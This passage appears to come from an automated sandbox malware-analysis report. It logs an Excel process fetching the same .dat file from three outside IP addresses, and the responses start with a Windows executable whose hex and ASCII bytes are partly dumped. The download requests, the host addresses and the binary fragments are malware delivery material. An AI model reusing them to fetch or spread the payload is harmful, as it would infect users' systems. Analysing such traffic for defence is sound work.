                Sep 24, 2021 17:27:14.866986990 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.869179964 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.887280941 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.887522936 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.891525030 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.891560078 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.891578913 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.891598940 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.891625881 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.891653061 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.891671896 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.891691923 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.891716957 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.891750097 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.891781092 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.891807079 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.891942024 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.895215034 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.908132076 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.908313036 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.910217047 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.910276890 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.910291910 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.910305977 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.910320044 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.910334110 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.910381079 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.910396099 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.910478115 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.910526037 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.910541058 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.910554886 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.910816908 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.910835981 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.910840034 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.910842896 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.910845041 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.912493944 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.927279949 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.927505016 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.937464952 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.937602043 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.937640905 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.937690020 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.937731981 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.937764883 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.937771082 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.937809944 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.937822104 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.937848091 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.937860012 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.937884092 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.937900066 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.937922955 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.937932968 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.937961102 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.937966108 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.938004017 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.938010931 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.938052893 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.938059092 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.938090086 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.938101053 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.938128948 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.938133001 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.938163996 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.938173056 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.938205004 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.940155029 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:28:06.374176025 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:28:06.374361038 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:28:18.872606993 CEST8049168111.90.148.104192.168.2.22
                Sep 24, 2021 17:28:18.872796059 CEST4916880192.168.2.22111.90.148.104
                Sep 24, 2021 17:28:19.937988043 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:28:19.938107967 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:28:57.652108908 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:28:57.652287006 CEST4916880192.168.2.22111.90.148.104
                Sep 24, 2021 17:28:57.652472019 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:28:57.672657967 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:28:57.855547905 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:28:57.870100021 CEST8049168111.90.148.104192.168.2.22

                HTTP Request Dependency Graph

                • 190.14.37.173
                • 111.90.148.104
                • 51.89.115.111

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.2249167190.14.37.17380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Sep 24, 2021 17:26:57.963424921 CEST0OUTGET /44463.7272820602.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 190.14.37.173
                Connection: Keep-Alive
                Sep 24, 2021 17:26:59.014862061 CEST1INHTTP/1.1 200 OK
                Server: nginx
                Date: Fri, 24 Sep 2021 15:26:58 GMT
                Content-Type: application/octet-stream
                Content-Length: 495616
                Connection: keep-alive
                X-Powered-By: PHP/5.4.16
                Accept-Ranges: bytes
                Expires: 0
                Cache-Control: no-cache, no-store, must-revalidate
                Content-Disposition: attachment; filename="44463.7272820602.dat"
                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$T````X`7Z2`7Z`>`a`7ZG`7Z`7Z`7Z`Rich`PEL'E!1{?9<`p/@,.text5 `.rdata@@.data<PP@.reloc$`0`@B
                Sep 24, 2021 17:26:59.014928102 CEST3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii:
                Sep 24, 2021 17:26:59.014966965 CEST4INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii:
                Sep 24, 2021 17:26:59.015007019 CEST6INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii:
                Sep 24, 2021 17:26:59.015043974 CEST7INData Raw: 3b f0 74 1c 00 9f c8 5d 07 10 8b c6 2b c3 03 c8 8b c1 2b c3 83 ef 02 83 ff 02 8d 74 06 50 7f d9 0f b6 05 d5 5d 07 10 8b d9 0f af de 0f b6 35 cd 5d 07 10 69 db 93 6c 01 00 8d 3c 30 81 ff c4 00 00 00 a0 78 5d 07 10 89 0d d8 5d 07 10 75 1e 0f b6 f0
                Data Ascii: ;t]++tP]5]il<0x]]u+fl$+a]*T$U]]PIu++a]*T$U]]5]+U;wT]];va-t]+
                Sep 24, 2021 17:26:59.015094995 CEST8INData Raw: 07 10 80 c2 55 00 15 d7 5d 07 10 83 c3 50 81 7c 24 24 c4 00 00 00 75 1d 8b 15 c4 5d 07 10 03 d2 8b f2 2b 35 74 5d 07 10 2b f1 83 c6 61 89 35 74 5d 07 10 eb 23 0f b6 05 74 5d 07 10 8b 35 74 5d 07 10 2a c1 04 55 00 05 d7 5d 07 10 83 05 c4 5d 07 10
                Data Ascii: U]P|$$u]+5t]+a5t]#t]5t]*U]]Px]9]r]5t]*(]x]T$(s+T$(T$f|$]+v 5]u]*]*x]ax]];wT]]
                Sep 24, 2021 17:26:59.015166998 CEST8INData Raw: 07 10 2a d3 80 c2 61 83 c4 04 a3 d8 5d 07 10 88 15 78 5d 07 10 84 28 0b 67 8b 35 c4 5d 07 10 66 0f b6 3d d2 5d 07 10 8b cb 2b ce 83 c1 03 0f b7 c9 66 3b f9 89 4c 24 10 77 0c 0f b7 c9 a2 cc 5d 07 10 8d 5c 01 0a 8d 8c 1e bd 3f 00 00 0f b7 c9 89 4c
                Data Ascii: *a]x](g5]f=]+f;L$w]\?L$f$=];t%]++\Px]]]=
                Sep 24, 2021 17:26:59.015211105 CEST10INData Raw: 5d 07 10 3b c7 74 27 0f b6 86 c8 5d 07 10 2b d8 0f b7 fd 8b c3 2b c7 0f b6 f9 83 c0 61 3b c7 a3 d8 5d 07 10 74 08 83 c6 01 83 fe 32 7c ce 5f 5e 5d 0f b6 c2 5b 83 c4 20 c3 cc cc cc 53 55 8b 6c 24 0c 56 8b f0 8b 4e 18 83 f9 08 8d 5e 04 72 04 8b 03
                Data Ascii: ];t']++a;]t2|_^][ SUl$VN^r=iw7rVP=ivri+QV^][F+;v(;swvMW~_t;FrNU+hiPJR1~~r
                Sep 24, 2021 17:26:59.015249968 CEST11INData Raw: 66 c7 04 58 00 00 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 8b 75 08 83 7e 18 08 72 0c 8b 56 04 52 e8 ae 09 00 00 83 c4 04 33 c0 50 c7 46 18 07 00 00 00 89 46 14 50 66 89 46 04 e8 cc 0d 00 00 cc cc cc cc cc cc cc cc cc cc cc cc
                Data Ascii: fXMdY_^[]u~rVR3PFFPfFw3RT3s$PL$D$hh8L$QD$oD$VP^% %%%$Uuuuu
                Sep 24, 2021 17:26:59.015290976 CEST13INData Raw: 0b ff 71 14 56 e8 bd fc ff ff eb 29 80 7c 24 0c 00 74 18 83 fe 10 73 13 8b 41 14 3b f0 73 02 8b c6 50 6a 01 e8 53 fc ff ff eb 0a 85 f6 75 06 56 e8 2b fc ff ff 33 c0 3b c6 1b c0 f7 d8 5e c2 08 00 56 ff 74 24 08 8b f1 e8 a1 fe ff ff c7 06 c4 a1 02
                Data Ascii: qV)|$tsA;sPjSuV+3;^Vt$^US]VW}G;s+EE;EsE;uEjPSjFjuCt8rNrFFuWQPuz_^[]UV
                Sep 24, 2021 17:26:59.218410015 CEST14INData Raw: 01 74 07 56 e8 5d ff ff ff 59 8b c6 5e c2 04 00 8b 44 24 04 83 c1 09 51 83 c0 09 50 e8 6d 14 00 00 f7 d8 59 1b c0 59 40 c2 04 00 56 6a 01 68 8c 50 07 10 8b f1 e8 f5 fc ff ff c7 06 a0 a1 02 10 8b c6 5e c3 55 8b ec 83 ec 0c eb 0d ff 75 08 e8 f6 15
                Data Ascii: tV]Y^D$QPmYY@VjhP^UuYtunYtL^@^uL^h!YVMhh8EPEUQESVWWjPu3V>LVj


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.2249168111.90.148.10480C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Sep 24, 2021 17:27:01.562551975 CEST520OUTGET /44463.7272820602.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 111.90.148.104
                Connection: Keep-Alive
                Sep 24, 2021 17:27:02.537890911 CEST522INHTTP/1.1 200 OK
                Server: nginx
                Date: Fri, 24 Sep 2021 15:27:03 GMT
                Content-Type: application/octet-stream
                Content-Length: 495616
                Connection: keep-alive
                X-Powered-By: PHP/5.4.16
                Accept-Ranges: bytes
                Expires: 0
                Cache-Control: no-cache, no-store, must-revalidate
                Content-Disposition: attachment; filename="44463.7272820602.dat"
                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$T````X`7Z2`7Z`>`a`7ZG`7Z`7Z`7Z`Rich`PEL'E!1{?9<`p/@,.text5 `.rdata@@.data<PP@.reloc$`0`@B
                Sep 24, 2021 17:27:02.537951946 CEST523INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii:
                Sep 24, 2021 17:27:02.537985086 CEST524INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii:
                Sep 24, 2021 17:27:02.538022041 CEST526INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii:
                Sep 24, 2021 17:27:02.538059950 CEST527INData Raw: 3b f0 74 1c 00 9f c8 5d 07 10 8b c6 2b c3 03 c8 8b c1 2b c3 83 ef 02 83 ff 02 8d 74 06 50 7f d9 0f b6 05 d5 5d 07 10 8b d9 0f af de 0f b6 35 cd 5d 07 10 69 db 93 6c 01 00 8d 3c 30 81 ff c4 00 00 00 a0 78 5d 07 10 89 0d d8 5d 07 10 75 1e 0f b6 f0
                Data Ascii: ;t]++tP]5]il<0x]]u+fl$+a]*T$U]]PIu++a]*T$U]]5]+U;wT]];va-t]+
                Sep 24, 2021 17:27:02.538098097 CEST528INData Raw: 07 10 80 c2 55 00 15 d7 5d 07 10 83 c3 50 81 7c 24 24 c4 00 00 00 75 1d 8b 15 c4 5d 07 10 03 d2 8b f2 2b 35 74 5d 07 10 2b f1 83 c6 61 89 35 74 5d 07 10 eb 23 0f b6 05 74 5d 07 10 8b 35 74 5d 07 10 2a c1 04 55 00 05 d7 5d 07 10 83 05 c4 5d 07 10
                Data Ascii: U]P|$$u]+5t]+a5t]#t]5t]*U]]Px]9]r]5t]*(]x]T$(s+T$(T$f|$]+v 5]u]*]*x]ax]];wT]]
                Sep 24, 2021 17:27:02.538125992 CEST529INData Raw: 07 10 2a d3 80 c2 61 83 c4 04 a3 d8 5d 07 10 88 15 78 5d 07 10 84 28 0b 67 8b 35 c4 5d 07 10 66 0f b6 3d d2 5d 07 10 8b cb 2b ce 83 c1 03 0f b7 c9 66 3b f9 89 4c 24 10 77 0c 0f b7 c9 a2 cc 5d 07 10 8d 5c 01 0a 8d 8c 1e bd 3f 00 00 0f b7 c9 89 4c
                Data Ascii: *a]x](g5]f=]+f;L$w]\?L$f$=];t%]++\Px]]]=
                Sep 24, 2021 17:27:02.538163900 CEST530INData Raw: 5d 07 10 3b c7 74 27 0f b6 86 c8 5d 07 10 2b d8 0f b7 fd 8b c3 2b c7 0f b6 f9 83 c0 61 3b c7 a3 d8 5d 07 10 74 08 83 c6 01 83 fe 32 7c ce 5f 5e 5d 0f b6 c2 5b 83 c4 20 c3 cc cc cc 53 55 8b 6c 24 0c 56 8b f0 8b 4e 18 83 f9 08 8d 5e 04 72 04 8b 03
                Data Ascii: ];t']++a;]t2|_^][ SUl$VN^r=iw7rVP=ivri+QV^][F+;v(;swvMW~_t;FrNU+hiPJR1~~r
                Sep 24, 2021 17:27:02.538203001 CEST531INData Raw: 66 c7 04 58 00 00 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 8b 75 08 83 7e 18 08 72 0c 8b 56 04 52 e8 ae 09 00 00 83 c4 04 33 c0 50 c7 46 18 07 00 00 00 89 46 14 50 66 89 46 04 e8 cc 0d 00 00 cc cc cc cc cc cc cc cc cc cc cc cc
                Data Ascii: fXMdY_^[]u~rVR3PFFPfFw3RT3s$PL$D$hh8L$QD$oD$VP^% %%%$Uuuuu
                Sep 24, 2021 17:27:02.734069109 CEST533INData Raw: 0b ff 71 14 56 e8 bd fc ff ff eb 29 80 7c 24 0c 00 74 18 83 fe 10 73 13 8b 41 14 3b f0 73 02 8b c6 50 6a 01 e8 53 fc ff ff eb 0a 85 f6 75 06 56 e8 2b fc ff ff 33 c0 3b c6 1b c0 f7 d8 5e c2 08 00 56 ff 74 24 08 8b f1 e8 a1 fe ff ff c7 06 c4 a1 02
                Data Ascii: qV)|$tsA;sPjSuV+3;^Vt$^US]VW}G;s+EE;EsE;uEjPSjFjuCt8rNrFFuWQPuz_^[]UV
                Sep 24, 2021 17:27:02.754579067 CEST534INData Raw: 01 74 07 56 e8 5d ff ff ff 59 8b c6 5e c2 04 00 8b 44 24 04 83 c1 09 51 83 c0 09 50 e8 6d 14 00 00 f7 d8 59 1b c0 59 40 c2 04 00 56 6a 01 68 8c 50 07 10 8b f1 e8 f5 fc ff ff c7 06 a0 a1 02 10 8b c6 5e c3 55 8b ec 83 ec 0c eb 0d ff 75 08 e8 f6 15
                Data Ascii: tV]Y^D$QPmYY@VjhP^UuYtunYtL^@^uL^h!YVMhh8EPEUQESVWWjPu3V>LVj


                Session IDSource IPSource PortDestination IPDestination PortProcess
                2192.168.2.224916951.89.115.11180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Sep 24, 2021 17:27:13.975816965 CEST1046OUTGET /44463.7272820602.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 51.89.115.111
                Connection: Keep-Alive
                Sep 24, 2021 17:27:14.178706884 CEST1048INHTTP/1.1 200 OK
                Server: nginx
                Date: Fri, 24 Sep 2021 15:27:14 GMT
                Content-Type: application/octet-stream
                Content-Length: 495616
                Connection: keep-alive
                X-Powered-By: PHP/5.4.16
                Accept-Ranges: bytes
                Expires: 0
                Cache-Control: no-cache, no-store, must-revalidate
                Content-Disposition: attachment; filename="44463.7272820602.dat"
